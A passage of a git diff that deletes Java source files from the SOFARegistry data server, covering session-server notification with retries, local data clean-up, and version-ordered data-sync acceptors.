- List connections = sessionServerConnectionFactory.getConnections(); - for (Connection connection : connections) { - doNotify(new NotifyCallback(connection, request)); - } - } - - private void doNotify(NotifyCallback notifyCallback) { - Connection connection = notifyCallback.connection; - DataChangeRequest request = notifyCallback.request; - try { - //check connection active - if (!connection.isFine()) { - if (LOGGER.isInfoEnabled()) { - LOGGER - .info(String - .format( - "connection from sessionserver(%s) is not fine, so ignore notify, retryTimes=%s,request=%s", - connection.getRemoteAddress(), notifyCallback.retryTimes, request)); - } - return; - } - Server sessionServer = boltExchange.getServer(dataServerBootstrapConfig.getPort()); - sessionServer.sendCallback(sessionServer.getChannel(connection.getRemoteAddress()), - request, notifyCallback, dataServerBootstrapConfig.getRpcTimeout()); - } catch (Exception e) { - LOGGER.error(String.format( - "invokeWithCallback failed: sessionserver(%s),retryTimes=%s, request=%s", - connection.getRemoteAddress(), notifyCallback.retryTimes, request), e); - onFailed(notifyCallback); - } - } - - /** - * on failed, retry if necessary - */ - private void onFailed(NotifyCallback notifyCallback) { - DataChangeRequest request = notifyCallback.request; - Connection connection = notifyCallback.connection; - notifyCallback.retryTimes++; - - if (notifyCallback.retryTimes <= dataServerBootstrapConfig.getNotifySessionRetryTimes()) { - this.asyncHashedWheelTimer.newTimeout(timeout -> { - if (LOGGER.isInfoEnabled()) { - LOGGER.info(String.format("retrying notify sessionserver(%s), retryTimes=%s, request=%s", - connection.getRemoteAddress(), notifyCallback.retryTimes, request)); - } - //check version, if it's fall behind, stop retry - long currentVersion = DatumCache.get(request.getDataCenter(), request.getDataInfoId()).getVersion(); - if (request.getVersion() == currentVersion) { - doNotify(notifyCallback); - } else { - if (LOGGER.isInfoEnabled()) { - LOGGER.info(String.format( - "current version change %s, retry version is %s, stop retry! retryTimes=%s, request=%s", - currentVersion, request.getVersion(), notifyCallback.retryTimes, request)); - } - } - }, getDelayTimeForRetry(notifyCallback.retryTimes), TimeUnit.MILLISECONDS); - } else { - LOGGER.error( - String.format("retryTimes have exceeded! stop retry! retryTimes=%s, sessionServer(%s), request=%s", - notifyCallback.retryTimes, connection.getRemoteAddress(), request)); - } - } - - private long getDelayTimeForRetry(int retryTimes) { - long initialSleepTime = TimeUnit.MILLISECONDS.toMillis(dataServerBootstrapConfig - .getNotifySessionRetryFirstDelay()); - long increment = TimeUnit.MILLISECONDS.toMillis(dataServerBootstrapConfig - .getNotifySessionRetryIncrementDelay()); - long result = initialSleepTime + (increment * (retryTimes - 1)); - return result >= 0L ? result : 0L; - } - - private class NotifyCallback implements CallbackHandler { - - private int retryTimes = 0; - private Connection connection; - private DataChangeRequest request; - - public NotifyCallback(Connection connection, DataChangeRequest request) { - this.connection = connection; - this.request = request; - } - - @Override - public void onCallback(Channel channel, Object message) { - CommonResponse result = (CommonResponse) message; - if (result != null && !result.isSuccess()) { - LOGGER - .error(String - .format( - "response not success when notify sessionserver(%s), retryTimes=%s, request=%s, response=%s", - connection.getRemoteAddress(), retryTimes, request, result)); - onFailed(this); - } - } - - @Override - public void onException(Channel channel, Throwable e) { - LOGGER.error(String.format( - "exception when notify sessionserver(%s), retryTimes=%s, request=%s", - connection.getRemoteAddress(), retryTimes, request), e); - onFailed(this); - } - - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/TempPublisherNotifier.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/TempPublisherNotifier.java deleted file mode 100644 index b37fa7541..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/notify/TempPublisherNotifier.java +++ /dev/null @@ -1,157 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change.notify; - -import com.alipay.remoting.Connection; -import com.alipay.remoting.InvokeCallback; -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.sessionserver.DataPushRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.CallbackHandler; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashSet; -import java.util.List; -import java.util.Set; -import java.util.concurrent.Executor; - -/** - * - * @author shangyu.wh - * @version $Id: TempPublisherNotifier.java, v 0.1 2018-08-29 18:05 shangyu.wh Exp $ - */ -public class TempPublisherNotifier implements IDataChangeNotifier { - - private static final Logger LOGGER = LoggerFactory - .getLogger(TempPublisherNotifier.class); - - private static final Executor EXECUTOR = ExecutorFactory - .newFixedThreadPool(10, - TempPublisherNotifier.class - .getSimpleName()); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - @Override - public Set getSuitableSource() { - Set set = new HashSet<>(); - set.add(DataSourceTypeEnum.PUB_TEMP); - return set; - } - - @Override - public void notify(Datum datum, Long lastVersion) { - DataPushRequest request = new DataPushRequest(datum); - List connections = sessionServerConnectionFactory.getConnections(); - for (Connection connection : connections) { - doNotify(new NotifyPushDataCallback(connection, request)); - } - } - - private void doNotify(NotifyPushDataCallback notifyPushdataCallback) { - - Connection connection = notifyPushdataCallback.getConnection(); - DataPushRequest request = notifyPushdataCallback.getRequest(); - try { - Server sessionServer = boltExchange.getServer(dataServerBootstrapConfig.getPort()); - sessionServer.sendCallback(sessionServer.getChannel(connection.getRemoteAddress()), - request, new CallbackHandler() { - - @Override - public void onCallback(Channel channel, Object message) { - notifyPushdataCallback.onResponse(message); - } - - @Override - public void onException(Channel channel, Throwable exception) { - notifyPushdataCallback.onException(exception); - } - }, dataServerBootstrapConfig.getRpcTimeout()); - } catch (Exception e) { - LOGGER.error("[TempPublisherNotifier] notify sessionserver {} failed, {}", - connection.getRemoteIP(), request, e); - } - } - - private static class NotifyPushDataCallback implements InvokeCallback { - - private Connection connection; - - private DataPushRequest request; - - public NotifyPushDataCallback(Connection connection, DataPushRequest request) { - this.connection = connection; - this.request = request; - } - - @Override - public void onResponse(Object obj) { - CommonResponse result = (CommonResponse) obj; - if (result != null && !result.isSuccess()) { - //doNotify(this); - LOGGER - .error( - "[TempPublisherNotifier] notify sessionserver {} not success, request={}, result={}", - connection.getRemoteIP(), request, result.getMessage()); - } - } - - @Override - public void onException(Throwable e) { - onResponse(CommonResponse.buildFailedResponse(e.getMessage())); - } - - @Override - public Executor getExecutor() { - return EXECUTOR; - } - - /** - * Getter method for property connection. - * - * @return property value of connection - */ - public Connection getConnection() { - return connection; - } - - /** - * Getter method for property request. - * - * @return property value of request - */ - public DataPushRequest getRequest() { - return request; - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/correction/LocalDataServerCleanHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/correction/LocalDataServerCleanHandler.java deleted file mode 100644 index bfc1fc3c8..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/correction/LocalDataServerCleanHandler.java +++ /dev/null @@ -1,170 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.correction; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.BackupTriad; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.util.DelayItem; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Map; -import java.util.Map.Entry; -import java.util.concurrent.DelayQueue; -import java.util.concurrent.Executor; -import java.util.concurrent.atomic.AtomicBoolean; - -/** - * - * @author shangyu.wh - * @version $Id: LocalDataServerCleanHandler.java, v 0.1 2018-07-16 17:50 shangyu.wh Exp $ - */ -public class LocalDataServerCleanHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(LocalDataServerCleanHandler.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DataServerCache dataServerCache; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - private LocalCleanTask task; - - /** - * a DelayQueue that contains clean task - */ - private final DelayQueue> EVENT_QUEUE = new DelayQueue<>(); - - /** - * constructor - */ - public LocalDataServerCleanHandler() { - LOGGER.info("[LocalDataServerCleanHandler] begin start LocalDataServerCleanHandler"); - Executor executor = ExecutorFactory - .newSingleThreadExecutor(LocalDataServerCleanHandler.class.getSimpleName()); - executor.execute(() -> { - while (true) { - try { - DelayItem delayItem = EVENT_QUEUE.take(); - task = delayItem.getItem(); - task.run(); - } catch (Throwable e) { - LOGGER.error("[LocalDataServerCleanHandler] handle clean task failed", e); - } - } - }); - LOGGER.info("[LocalDataServerCleanHandler] start LocalDataServerCleanHandler success"); - } - - /** - * - */ - public void reset() { - synchronized (LocalDataServerCleanHandler.class) { - if (EVENT_QUEUE.isEmpty() && task != null) { - task.stop(); - EVENT_QUEUE.clear(); - } - } - EVENT_QUEUE.add(new DelayItem<>(new LocalCleanTask(), dataServerBootstrapConfig - .getLocalDataServerCleanDelay())); - } - - private class LocalCleanTask { - - private AtomicBoolean running = new AtomicBoolean(false); - - /** - * - */ - public void run() { - if (running.compareAndSet(false, true)) { - try { - - Map dataNodeMap = dataServerCache - .getDataServers(dataServerBootstrapConfig.getLocalDataCenter()); - if (dataNodeMap == null || dataNodeMap.isEmpty()) { - LOGGER.warn("Calculate Old BackupTriad,old dataServer list is empty!"); - return; - } - - ConsistentHash consistentHash = new ConsistentHash<>( - dataServerBootstrapConfig.getNumberOfReplicas(), dataNodeMap.values()); - - Map> dataMapAll = DatumCache.getAll(); - - for (Entry> entryAll : dataMapAll.entrySet()) { - String dataCenter = entryAll.getKey(); - Map dataMap = entryAll.getValue(); - for (Entry entry : dataMap.entrySet()) { - - String dataInfoId = entry.getKey(); - Datum datum = entry.getValue(); - if (!running.get()) { - LOGGER.info( - "[LocalDataServerCleanHandler] task cancel, dataInfoId={}", - dataInfoId); - return; - } - - BackupTriad backupTriad = new BackupTriad(dataInfoId, - consistentHash.getNUniqueNodesFor(dataInfoId, - dataServerBootstrapConfig.getStoreNodes())); - if (!backupTriad.containsSelf()) { - if (datum != null) { - int size = datum.getPubMap() != null ? datum.getPubMap().size() - : 0; - dataChangeEventCenter.clean(datum, DataSourceTypeEnum.CLEAN); - LOGGER - .info( - "[LocalDataServerCleanHandler] clean handle, dataCenter={},dataInfoId={},pub size={}", - dataCenter, dataInfoId, size); - } - } - } - } - } catch (Throwable e) { - LOGGER.error("[LocalDataServerCleanHandler] clean local datum task error!", e); - } finally { - EVENT_QUEUE.add(new DelayItem<>(new LocalCleanTask(), dataServerBootstrapConfig - .getLocalDataServerCleanDelay())); - } - } - } - - /** - * - */ - public void stop() { - running.set(false); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/AcceptorStore.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/AcceptorStore.java deleted file mode 100644 index c17bbd257..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/AcceptorStore.java +++ /dev/null @@ -1,58 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync; - -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; - -/** - * - * @author shangyu.wh - * @version $Id: AcceptorStore.java, v 0.1 2018-03-22 12:21 shangyu.wh Exp $ - */ -public interface AcceptorStore { - - /** - * appender operator logs to Acceptor - * @param operator - */ - void addOperator(Operator operator); - - /** - * notify change fire sync data get request,get sync data return - * @param syncDataRequest - * @return - */ - SyncData getSyncData(SyncDataRequest syncDataRequest); - - /** - * scheduler get change Acceptor to notify other dataCenter or data node get sync data - */ - void changeDataCheck(); - - /** - * scheduler check Acceptor has Expired,remove all queue logs - */ - void checkAcceptorsChangAndExpired(); - - /** - * get sync type,dataCenter or dataNode - * @return - */ - String getType(); - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/Operator.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/Operator.java deleted file mode 100644 index 60f186a39..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/Operator.java +++ /dev/null @@ -1,128 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; - -/** - * - * @author shangyu.wh - * @version $Id: Operator.java, v 0.1 2018-03-05 17:01 shangyu.wh Exp $ - */ -public class Operator { - - private Long version; - - private Long sourceVersion; - - private Datum datum; - - private DataSourceTypeEnum sourceType; - - /** - * constructor - */ - public Operator() { - } - - /** - * constructor - * @param version - * @param sourceVersion - * @param datum - * @param sourceType - */ - public Operator(Long version, Long sourceVersion, Datum datum, DataSourceTypeEnum sourceType) { - this.version = version; - this.sourceVersion = sourceVersion; - this.datum = datum; - this.sourceType = sourceType; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property sourceVersion. - * - * @return property value of sourceVersion - */ - public Long getSourceVersion() { - return sourceVersion; - } - - /** - * Setter method for property sourceVersion. - * - * @param sourceVersion value to be assigned to property sourceVersion - */ - public void setSourceVersion(Long sourceVersion) { - this.sourceVersion = sourceVersion; - } - - /** - * Getter method for property datum. - * - * @return property value of datum - */ - public Datum getDatum() { - return datum; - } - - /** - * Setter method for property datum. - * - * @param datum value to be assigned to property datum - */ - public void setDatum(Datum datum) { - this.datum = datum; - } - - /** - * Getter method for property sourceType. - * - * @return property value of sourceType - */ - public DataSourceTypeEnum getSourceType() { - return sourceType; - } - - /** - * Setter method for property sourceType. - * - * @param sourceType value to be assigned to property sourceType - */ - public void setSourceType(DataSourceTypeEnum sourceType) { - this.sourceType = sourceType; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/SyncDataService.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/SyncDataService.java deleted file mode 100644 index 6812526c5..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/SyncDataService.java +++ /dev/null @@ -1,42 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync; - -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; - -/** - * - * @author shangyu.wh - * @version $Id: SyncDataService.java, v 0.1 2018-03-09 17:10 shangyu.wh Exp $ - */ -public interface SyncDataService { - - /** - * - * @param operator - */ - void appendOperator(Operator operator); - - /** - * - * @param syncDataRequest - * @return - */ - SyncData getSyncDataChange(SyncDataRequest syncDataRequest); - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/AbstractAcceptorStore.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/AbstractAcceptorStore.java deleted file mode 100644 index c85ff165c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/AbstractAcceptorStore.java +++ /dev/null @@ -1,273 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.NotifyDataSyncRequest; -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.datasync.AcceptorStore; -import com.alipay.sofa.registry.server.data.datasync.Operator; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import com.alipay.sofa.registry.server.data.util.DelayItem; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.List; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.DelayQueue; - -/** - * - * @author shangyu.wh - * @version $Id: AbstractAcceptorStore.java, v 0.1 2018-03-22 12:28 shangyu.wh Exp $ - */ -public abstract class AbstractAcceptorStore implements AcceptorStore { - private static final Logger LOGGER = LoggerFactory - .getLogger( - AbstractAcceptorStore.class, - "[SyncDataService]"); - - private static final int DEFAULT_MAX_BUFFER_SIZE = 30; - private static final int DEFAULT_DELAY_TIMEOUT = 3000; - private static final int NOTIFY_RETRY = 3; - - @Autowired - protected IMetaServerService metaServerService; - - @Autowired - private Exchange boltExchange; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DataServerConnectionFactory dataServerConnectionFactory; - - private Map> acceptors = new ConcurrentHashMap<>(); - - private Map> notifyAcceptorsCache = new ConcurrentHashMap<>(); - - private DelayQueue> delayQueue = new DelayQueue<>(); - - @Override - public void checkAcceptorsChangAndExpired() { - acceptors.forEach((dataCenter, acceptorMap) -> { - if (acceptorMap != null && !acceptorMap.isEmpty()) { - acceptorMap.forEach((dataInfoId, acceptor) -> acceptor.checkExpired(0)); - } - }); - } - - private String getLogByClass(String msg) { - StringBuilder sb = new StringBuilder(); - sb.append(" [").append(this.getClass().getSimpleName()).append("] ").append(msg); - return sb.toString(); - } - - @Override - public void addOperator(Operator operator) { - - Datum datum = operator.getDatum(); - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - try { - Map acceptorMap = acceptors.get(dataCenter); - if (acceptorMap == null) { - Map newMap = new ConcurrentHashMap<>(); - acceptorMap = acceptors.putIfAbsent(dataCenter, newMap); - if (acceptorMap == null) { - acceptorMap = newMap; - } - } - - Acceptor existAcceptor = acceptorMap.get(dataInfoId); - if (existAcceptor == null) { - Acceptor newAcceptor = new Acceptor(DEFAULT_MAX_BUFFER_SIZE, dataInfoId, dataCenter); - existAcceptor = acceptorMap.putIfAbsent(dataInfoId, newAcceptor); - if (existAcceptor == null) { - existAcceptor = newAcceptor; - } - } - existAcceptor.appendOperator(operator); - //put cache - putCache(existAcceptor); - } catch (Exception e) { - LOGGER.error(getLogByClass("Append Operator error!"), e); - throw new RuntimeException("Append Operator error!", e); - } - } - - private void putCache(Acceptor acceptor) { - - String dataCenter = acceptor.getDataCenter(); - String dataInfoId = acceptor.getDataInfoId(); - - try { - Map acceptorMap = notifyAcceptorsCache.get(dataCenter); - if (acceptorMap == null) { - Map newMap = new ConcurrentHashMap<>(); - acceptorMap = notifyAcceptorsCache.putIfAbsent(dataCenter, newMap); - if (acceptorMap == null) { - acceptorMap = newMap; - } - } - Acceptor existAcceptor = acceptorMap.putIfAbsent(dataInfoId, acceptor); - if (existAcceptor == null) { - addQueue(acceptor); - } - } catch (Exception e) { - LOGGER.error(getLogByClass("Operator push to delay cache error!"), e); - throw new RuntimeException("Operator push to delay cache error!", e); - } - } - - private void removeCache(Acceptor acceptor) { - String dataCenter = acceptor.getDataCenter(); - String dataInfoId = acceptor.getDataInfoId(); - - try { - Map acceptorMap = notifyAcceptorsCache.get(dataCenter); - if (acceptorMap != null) { - boolean result = acceptorMap.remove(dataInfoId, acceptor); - if (result) { - //data change notify - notifyChange(acceptor); - } - } - } catch (Exception e) { - LOGGER.error(getLogByClass("Operator remove from delay cache error!"), e); - throw new RuntimeException("Operator remove from delay cache error!", e); - } - } - - private void addQueue(Acceptor acceptor) { - delayQueue.put(new DelayItem(acceptor, DEFAULT_DELAY_TIMEOUT)); - } - - private void notifyChange(Acceptor acceptor) { - - Long lastVersion = acceptor.getLastVersion(); - - //may be delete by expired - if (lastVersion == null) { - LOGGER - .warn(getLogByClass("There is not data in acceptor queue!maybe has been expired!")); - lastVersion = 0L; - } - - if (LOGGER.isDebugEnabled()) { - acceptor.printInfo(); - } - - NotifyDataSyncRequest request = new NotifyDataSyncRequest(acceptor.getDataInfoId(), - acceptor.getDataCenter(), lastVersion, getType()); - - List targetDataIps = getTargetDataIp(acceptor.getDataInfoId()); - for (String targetDataIp : targetDataIps) { - - if (DataServerConfig.IP.equals(targetDataIp)) { - continue; - } - - Connection connection = dataServerConnectionFactory.getConnection(targetDataIp); - if (connection == null) { - LOGGER.error(getLogByClass(String.format( - "Can not get notify data server connection!ip: %s", targetDataIp))); - continue; - } - LOGGER.info(getLogByClass("Notify data server {} change data {} to sync"), - connection.getRemoteIP(), request); - for (int tryCount = 0; tryCount < NOTIFY_RETRY; tryCount++) { - try { - Server syncServer = boltExchange.getServer(dataServerBootstrapConfig - .getSyncDataPort()); - syncServer.sendSync(syncServer.getChannel(connection.getRemoteAddress()), - request, 1000); - break; - } catch (Exception e) { - LOGGER.error(getLogByClass(String.format( - "Notify data server %s failed, NotifyDataSyncRequest:%s", targetDataIp, - request)), e); - } - } - } - } - - abstract public List getTargetDataIp(String dataInfoId); - - @Override - public void changeDataCheck() { - - while (true) { - try { - DelayItem delayItem = delayQueue.take(); - Acceptor acceptor = delayItem.getItem(); - removeCache(acceptor); // compare and remove - } catch (InterruptedException e) { - break; - } - } - - } - - @Override - public SyncData getSyncData(SyncDataRequest syncDataRequest) { - - String dataCenter = syncDataRequest.getDataCenter(); - String dataInfoId = syncDataRequest.getDataInfoId(); - - Long currentVersion = syncDataRequest.getVersion(); - try { - Map acceptorMap = acceptors.get(dataCenter); - if (acceptorMap == null) { - LOGGER.error( - getLogByClass("Can not find Sync Data acceptor instance,dataCenter:{}"), - dataCenter); - throw new RuntimeException("Can not find Sync Data acceptor instance!"); - } - - Acceptor existAcceptor = acceptorMap.get(dataInfoId); - if (existAcceptor == null) { - LOGGER.error( - getLogByClass("Can not find Sync Data acceptor instance,dataInfoId:{}"), - dataInfoId); - throw new RuntimeException("Can not find Sync Data acceptor instance!"); - } - return existAcceptor.process(currentVersion); - } catch (Exception e) { - LOGGER.error(getLogByClass("Get change SyncData error!"), e); - throw new RuntimeException("Get change SyncData error!", e); - } - } - - /** - * Getter method for property dataServerBootstrapConfig. - * - * @return property value of dataServerBootstrapConfig - */ - public DataServerConfig getDataServerConfig() { - return dataServerBootstrapConfig; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Acceptor.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Acceptor.java deleted file mode 100644 index 5650ea263..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Acceptor.java +++ /dev/null @@ -1,319 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.datasync.Operator; - -import java.nio.charset.Charset; -import java.util.ArrayList; -import java.util.Collection; -import java.util.Deque; -import java.util.Iterator; -import java.util.LinkedList; -import java.util.List; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.ConcurrentLinkedDeque; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; - -/** - * - * @author shangyu.wh - * @version $Id: Acceptor.java, v 0.1 2018-03-05 16:57 shangyu.wh Exp $ - */ -public class Acceptor { - - static final int DEFAULT_DURATION_SECS = 30; - private static final Logger LOGGER = LoggerFactory.getLogger( - Acceptor.class, - "[SyncDataService]"); - private final Deque logOperatorsOrder = new ConcurrentLinkedDeque<>(); - private final String dataInfoId; - private final String dataCenter; - private int maxBufferSize; - private Map logOperators = new ConcurrentHashMap<>(); - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock.readLock(); - private final Lock write = readWriteLock.writeLock(); - - /** - * constructor - * @param maxBufferSize - * @param dataInfoId - * @param dataCenter - */ - public Acceptor(int maxBufferSize, String dataInfoId, String dataCenter) { - this.maxBufferSize = maxBufferSize; - this.dataInfoId = dataInfoId; - this.dataCenter = dataCenter; - } - - /** - * append operator to queue,if queue is full poll the first element and append. - * Process will check version sequence,it must append with a consequent increase in version, - * otherwise queue will be clean - * - * @param operator - */ - public void appendOperator(Operator operator) { - write.lock(); - try { - if (isFull()) { - logOperators.remove(logOperatorsOrder.poll()); - } - if (operator.getSourceVersion() == null) { - operator.setSourceVersion(0L); - } - Long tailVersion = logOperatorsOrder.peekLast(); - - if (tailVersion != null) { - //operation add not by solid sequence - if (tailVersion.longValue() != operator.getSourceVersion().longValue()) { - LOGGER - .warn( - "Datum {} append operation not follow version sequence!Current version {},but input source version {}.In order to avoid get " - + "data error clear operations!", operator.getDatum() - .getDataInfoId(), tailVersion, operator.getSourceVersion()); - clearBefore(); 